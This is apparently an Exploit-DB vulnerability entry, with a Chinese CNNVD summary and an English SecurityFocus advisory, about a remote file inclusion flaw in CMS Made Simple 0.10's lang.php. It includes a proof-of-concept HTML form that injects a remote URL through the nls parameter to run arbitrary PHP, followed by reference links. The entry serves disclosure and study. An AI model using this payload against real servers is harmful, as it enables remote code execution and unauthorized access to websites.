https://www.exploit-db.com/exploits/26217
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200509-095

CMSMadeSimple是一个易于使用的内容管理系统用于具有简单、稳定内容的网站。使用PHP，MySQL和Smarty模板引擎开发。它具有：基于角色的权限管理系统，智能缓存机制(只有当需要时才会从数据库获取)，基于向导的安装与更新机制，对系统资源占用少，还包含文件管理，新闻发布和RSS模块等。CMSMadeSimple0.10及以前版本的lang.php文件的PHP远程文件包含漏洞允许远程攻击者通过nls参数[file][vx][vxsfx]执行任意PHP代码。

source: http://www.securityfocus.com/bid/14709/info

CMS Made Simple is prone to a remote file include vulnerability. This issue is due to a failure in the application to properly sanitize user-supplied input.

An attacker may exploit this issue to execute arbitrary remote PHP code on an affected computer with the privileges of the Web server process. This may facilitate unauthorized access.

CMS Made Simple Version .10 and all prior versions are reported vulnerable. 

example.html:
<form action="http://www.example.com/admin/lang.php?CMS_ADMIN_PAGE=1&nls[file][vx][vxsfx]=(__URL__)" method=post>
<input type=hidden name=change_cms_lang value=vx>
<input type=submit name=test VALUE="do it">
</form>
EOF

来源:SECUNIA
名称:16654
链接:http://secunia.com/advisories/16654/
来源:forum.cmsmadesimple.org
链接:http://forum.cmsmadesimple.org/index.php/topic,1549.0.html
来源:BID
名称:14709
链接:http://www.securityfocus.com/bid/14709
来源:BUGTRAQ
名称:20050831CMSMadeSimple<=0.10-PHPinjection
链接:http://marc.theaimsgroup.com/?l=bugtraq&m;=112552342004406&w;=2